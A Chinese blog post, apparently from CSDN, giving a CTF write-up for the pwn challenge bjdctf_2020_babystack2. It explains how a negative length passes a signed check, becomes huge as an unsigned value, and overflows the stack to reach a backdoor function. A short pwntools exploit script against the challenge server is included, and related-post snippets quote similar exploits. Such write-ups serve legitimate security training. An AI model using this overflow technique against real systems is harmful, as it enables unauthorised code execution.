BUUCTF刷题之路--bjdctf_2020_babystack21

于 2023-06-26 20:31:51 发布
阅读量91 收藏
点赞数
分类专栏: pwn CTF 文章标签: c++
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_30528603/article/details/131404781
版权
CTF 同时被 2 个专栏收录
26 篇文章 0 订阅
订阅专栏
pwn
23 篇文章 1 订阅
订阅专栏

太久没做题了,因为想赶秋招不得不暂时放弃一些爱好。今天一摸题两眼一麻黑,忘的都差不多了。做一题简单题练练手吧。

64位程序,没有我最讨厌的PIE。 接着我们去IDA中查看下这题的逻辑:

 主函数反编译后的结果。一开始我们看出什么门道,在题目中得知应该是一个栈溢出的题目,我在一看函数列表发现了一个后门函数:

那这题不就简单了吗。于是我迫不及待的在靶机上测试,在主函数中只有我们输入的数字不超过10就能得到执行read函数的机会。于是我把断点下到了scanf函数中。

 我输入了一个3,接着我们继续调试到read函数中。

 这个时候我就发现不对劲了。只能放入3个a。

 我在回去看代码逻辑发现了问题。

如果这个数小于10就能执行read,但是read的第三个参数就会变成我们的传入的数。而我们需要溢出的数最起码也要0x18才能利用。那么岂不是构不成栈溢出了?然后我们再仔细看,nbytes这个变量从int类型转换成了unsigned int类型。意思就是说这里人为的创造了一个整数溢出。那么我们只要输入一个负数就能逃避if的检查。接着强转后抛弃符号位这个数会变得非常大。足够我们溢出。但是在调试的时候,我输入负数在read函数那里会直接跳过输入。(不知道什么原因)。我只好直接上代码了:

# -*- coding: utf-8 -*-
from pwn import*
#from LibcSearcher import*
p=remote('node4.buuoj.cn','29689')
p.sendline('-2')#我这填入-1不弹shell
payload='a'*0x18+p64(0x400726)
p.sendline(payload)
p.interactive()

 得到flag: 

 

call就不要ret
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
BUUCTF Crypto 鸡藕椒盐味 wp
hsqGOD's blog
03-15 1797
从题目中可以得到,需要修正1100 1010 0000一串码的错误,然后通过md5加密得到flag 通过题目可以得到提示“奇偶校验位”,我们考虑计算机网络中提到的,海明纠错码 链接: 海明校验码. 通过将这串代码倒序放进海明码的公式(一开始正常顺序放进去不太对),可以发现倒序第九位出现错误,更正代码为110110100000,套入hash脚本得到flag // An highlighted blo...
bjdctf_2020_babystack
、moddemod
06-13 782
exp from pwn import * context(log_level = 'debug') proc_name = './bjdctf_2020_babystack' elf = ELF(proc_name) # p = process(proc_name) p = remote('node3.buuoj.cn', 29943) pop_ret = 0x400833 system_addr = elf.sym['system'] bin_sh_str = 0x400858 payload =..
BUUCTF_MISC题解
热门推荐
m0_52885531的博客
05-30 2万+
BUUCTF_MISC题解 第二题 金三胖 将GIF图片用ps进行逐帧分解,可以得到三张特殊的照片 直接将三个照片里的内容拼接起来就好 第三题 二维码 下载好附件解压后发现是一个.png文件的二维码 用CQR扫描后得到二维码的结果 发现并没有得到想要的flag,并且提示我们flag并不在这李,那我们就用二进制编辑器打开看一看在哪里。 .png的文件尾是AE 42 60 82,按理来说在文件尾之后就应该结束,我们却发现png的文件尾后还跟着50 4B 03 04,这是.zip的文件头,说明在该照片
bjdctf_2020_babystack题解
OrientalGlass的博客
01-08 348
send是模拟交互的情况,如果使用send(0x111)会有报错,并且发送的字符串要带上换行符,否则会无法结束输入。先输入一个整形数据用于确定buf串需要读入多少个字节,这里后续使用的是0x111。nbytes在buf下方,并且nbytes是qword类型,占8个字节。解释了为什么第一次send要使用字符串类型而不能直接发送int类型。不过这里还有一个异或就是本机运行该程序不能成功获取执行权,非常奇怪。再发送覆盖数据覆盖掉返回地址执行backdoor函数即可。首先输入一个足以覆盖掉返回地址的数字。
2020-HackIM_ctf_hackim-ctfwriteup_
09-28
这是hackim-ctf的writeup
Always-Y#Binary_study#IDA-Linux远程调试1
07-25
起因今天刷BUUCTF第三题 Reverse2,由于该程序石ELF格式,只能运行在Linux,动态调试需要GDB,对此我并不熟悉因此,跟大佬学习了,将软件放在L
BUUCTF-Web-Mark loves cat变量函数覆盖
02-16
php代码审计之变量覆盖漏洞 变量覆盖漏洞 自定义的参数值替换原有变量值的情况称为变量覆盖漏洞 经常导致变量覆盖漏洞场景有:$使用不当,extract()函数使用不当,parse_str()函数使用不当,import_request_...
BUUCTF-MISC-WP(详细解题思路)
最新发布
01-27
BUUCTF-MISC-WP(详细解题思路)
BUUCTF-PWN-[ZJCTF 2019]Login
07-10
BUUCTF-PWN-[ZJCTF 2019]Login
莫斯
02-20
莫斯
BUUCTF 基础破解
m0_49025459的博客
04-19 1013
题目 下载附件,发现压缩包有密码,而且根据题目来说是四位数字密码,扔到爆破工具里面爆破一下 爆破出密码,2563,输入密码发现是Base64加密 扔到在线破解网站,得到flagBase64解码 Base64编码 UTF8 GB2312 UTF16 GBK 二进制 十六进制 解密 - The X 在线工具 ...
BUUCTF之PWN(WP1)
NANMUZN的博客
01-15 629
buuctf pwn
[BUUCTF-pwn]——bjdctf_2020_babystack
Y_peak的博客
02-10 349
[BUUCTF-pwn]——bjdctf_2020_babystack 题目地址:https://buuoj.cn/challenges#bjdctf_2020_babystack Linux中checksec一下 , 64位的我们要小心参数小于6位的函数. IDA中看看 看到这里不用我多说了吧, So easy !!! exploit from pwn import * p = remote("node3.buuoj.cn",25355) sys = 0x04006EA p.sendlinea
BUUCTF Brute 1使用BurpSuite爆破详解
bill_fang的博客
08-28 1万+
最近研究一下白帽子安全,主要关注WEB安全,在做完了常规的靶场xsslab、SQLI、DVWA、Pikachu后,了解了白帽子安全的基础知识。进一步开始用一些CTF来练习。本文是从BUUCTF网站上,去解一个WEB的Flag的详细记录。0x00打开BUUCTF,打开靶机BUUCTF的地址在这里:BUUCTF在线评测 (buuoj.cn),进入后选择Basic->BUU BRUTE1.选择B...
bjdctf_2020_babystack2
、moddemod
06-30 306
exp from pwn import * context.log_level = 'debug' proc_name = './bjdctf_2020_babystack2' p = process(proc_name) p = remote('node3.buuoj.cn', 26363) ..
BUUCTFbjdctf_2020_babystack2(write up)
qq_44768749的博客
08-24 1475
BUUCTFbjdctf_2020_babystack20x01文件分析0x02 运行0x03 IDA0x04 思路0x05 exp 0x01文件分析 64位程序,开启了栈不可执行、部分RELRO保护 0x02 运行 先输入name的长度,再输入name 0x03 IDA 输入nbytes的长度要小于10 同时给出了后面函数直接getshell 0x04 思路 比较nbytes和10的大小,可以利用符号溢出漏洞,输入一个负数,进而输入name的时候可以实现栈溢出跳转到后门函数ge
BUUCTF(变异凯撒)
Bigotry77的博客
07-26 1836
小白看到题目的第一眼应该是没有思路,(我指的是纯小白) 我看到这个txt中的文本时就自动把afZ_和flag{}对上了。。。然后再看,偏移量?肯定不是,字母对不上,再看ASCII a, f, Z, _的ASCII码是 97, 102, 90, 95 而再看这里flag的ASCII码是102,108,97,103; 每个对应的都会相差5,可以自己推,不过感觉比较麻烦。。。 然后用python写个脚本:(借鉴的) def b_kaisa(str): first_step = 5 #首..
[BJDCTF2020]RSA
08-11
RSA(Rivest-Shamir-Adleman)是一种非对称加密算法,常用于数据加密和数字签名。它基于两个大素数的乘积作为公钥的一部分,并使用这两个素数的乘积作为私钥的一部分。RSA算法的安全性基于大数分解的难度,即将一个大数分解为其素数因子的难度。 在BJDCTF2020中,RSA可能是一个题目或者提到的某个技术细节。若有具体问题或需要更多信息,请提供详细内容以便我能够帮助你更好。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值